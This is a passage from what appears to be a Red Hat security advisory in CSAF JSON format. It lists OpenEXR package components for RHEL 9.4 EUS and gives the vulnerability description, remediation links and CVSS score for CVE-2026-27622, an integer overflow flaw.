"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T03:08:14+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8871"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"AppStream-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.src",
"CRB-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debuginfo-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-debugsource-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-devel-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-0:3.1.1-2.el9_4.2.x86_64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.aarch64",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.i686",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.ppc64le",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.s390x",
"CRB-9.4.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-2.el9_4.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.aarch64",
"AppStream-9.4.0.Z.EUS:openexr-0:3.1.1-2.el9_4.2.ppc64le",
